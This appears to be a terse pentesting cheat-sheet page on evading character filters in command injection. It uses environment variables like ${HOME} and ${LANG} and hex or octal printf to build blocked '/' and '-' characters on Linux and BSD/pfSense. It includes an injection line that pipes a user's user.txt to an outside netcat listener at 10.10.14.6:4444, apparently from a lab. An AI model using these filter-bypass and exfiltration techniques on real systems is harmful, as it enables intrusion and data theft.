Char Evasion Tricks
REF:
env
Scenario: blocked / and -
We can use env to grab a char we need
> env
HOME=/
LANG=en_US.ISO8559-1
cat ${HOME} ..slash
cat ${LANG:14:1} ..dash (wont work in bsd/pfsense)
LFI Example:
..queues;cat+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+4444
nc -nvlp 4444hex
printf hex (linux)
Doesnt work in bsd
octal
printf octal (bsd)
octal python
Straight from pfsense
spaces
REF: WAF
Avoid 'root' Filter with Splatting
REF: PrivEscBinaries, nodeHTB
Last updated
Was this helpful?